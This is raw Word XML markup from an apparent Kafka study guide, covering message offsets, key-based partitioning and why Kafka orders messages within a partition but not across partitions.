      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each message in Kafka is assigned a unique </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the partition. The offset is a sequential number that represents the position of the message in the partition. Kafka consumers use this offset to track the position of consumed messages and ensure that they consume messages in order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C279197" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="00000000" w:rsidP="005D2BDE">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E3E649B">
          <v:rect id="_x0000_i3205" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75092C69" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="005D2BDE">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2. Partition Key and Message Distribution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF9C12F" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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essage Key</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka producers can provide a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message key</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when sending a message. Kafka uses this key to determine which partition the message should go to. If the same key is provided for multiple messages, the partitioner will ensure that all messages with the same key are sent to the same partition, maintaining the ordering for messages with the same key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377530D2" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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Hashing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism to determine which partition a message will be sent to. This ensures that messages with the same key will always go to the same partition, preserving their order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DEAECC" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="00000000" w:rsidP="005D2BDE">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AA63606">
          <v:rect id="_x0000_i3206" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE49F06" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="005D2BDE">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3. Ordering Between Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB59DFE" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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No Global Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka does </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not guarantee</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> any ordering of messages </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>across different partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This means that while messages within a single partition will be ordered, messages from different partitions can be consumed in parallel and might not be processed in the order in which they were sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557AFA01" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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ultiple Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When using multiple partitions for scalability (for example, when using Kafka with many consumers), the consumer group may consume messages in parallel across partitions. However, this introduces the possibility that messages from different partitions will be consumed out of order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D5E54F" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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For example, if messages are written to two partitions (P1 and P2) in the following order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCAE595" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="149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artition P1: Msg1, Msg2, Msg3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD675D1" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="149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artition P2: Msg4, Msg5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D72DA52" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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If a consumer group reads from both partitions, </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg4</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> could be consumed before </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, even though </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg4</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was produced later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2E5E51" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="00000000" w:rsidP="005D2BDE">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57341FF">
          <v:rect id="_x0000_i3207" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE5443D" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="005D2BDE">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4. Consumer Behavior and Ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69778078" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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ingle Consumer per Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: To ensure message ordering, each partition should be consumed by a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a consumer group. If multiple consumers consume the same partition, they will violate </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kafka's ordering guarantee because multiple consumers cannot read the same partition's messages simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28887128" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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nsumer Offset Tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka consumers track their position using </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The consumer's offset is stored (either in Kafka or an external store like Zookeeper or Kafka itself), which ensures that each consumer reads messages in the correct order. The consumer can also commit offsets to Kafka, allowing them to resume consumption from the correct point in case of a failure or restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1569E526" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="00000000" w:rsidP="005D2BDE">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1B7A7DB">
          <v:rect id="_x0000_i3208" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A889F93" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="005D2BDE">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5. Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E89CC" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="005D2BDE">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Assume a Kafka topic with two partitions (P1, P2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D8FDD8" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149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roducer sends messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668F4426" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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artition P1: Msg1, Msg2, Msg3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2136493D" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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artition P2: Msg4, Msg5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA45E0F" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="005D2BDE">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essage Ordering within Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9486E" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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he consumer reading from Partition P1 will consume </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg1, Msg2, Msg3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this exact order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C7BC7" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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he consumer reading from Partition P2 will consume </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg4, Msg5</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this exact order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C556A3" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="005D2BDE">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essage Ordering across Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9980C8" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="149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If a consumer group reads from both P1 and P2, it will consume the messages independently from each partition, and the order of the messages between the two partitions might not be guaranteed. </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg4</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> could be consumed before </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> even though </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was produced first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE6322" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="00000000" w:rsidP="005D2BDE">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AF5CB2">
          <v:rect id="_x0000_i3209" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="185DC71A" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="005D2BDE">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Summary of Kafka's Ordering Guarantees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ABE950" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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Within a Single Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka guarantees that messages are consumed in the same order they were written.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E229D18" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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Across Multiple Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka does </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not guarantee</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> message ordering across partitions. Messages from different partitions can be consumed out of order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F1854C" w14:textId="77777777" w:rsidR="005D2BDE" w:rsidRPr="0003272F" w:rsidRDefault="005D2BDE" w:rsidP="005D2BDE">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o preserve ordering across partitions, the producer must ensure that related messages (with the same key or data) are sent to the same partition. This is often referred to as </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key-based partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0100ADB4" w14:textId="0463B56B" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0023377D">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rPr>
        <w:pict w14:anchorId="07C6BFF0">
          <v:rect id="_x0000_i3210" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="121482B9" w14:textId="32CC1C13" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E3566C" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="805" w:name="_Toc196308285"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain how Kafka ensures message order within a partition and the implications of partitioning on message order</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="805"/>
    </w:p>
    <w:p w14:paraId="12C09632" w14:textId="2B838ED1" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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s Message Ordering within a Partition:</w:t>
      </w:r>
    </w:p>
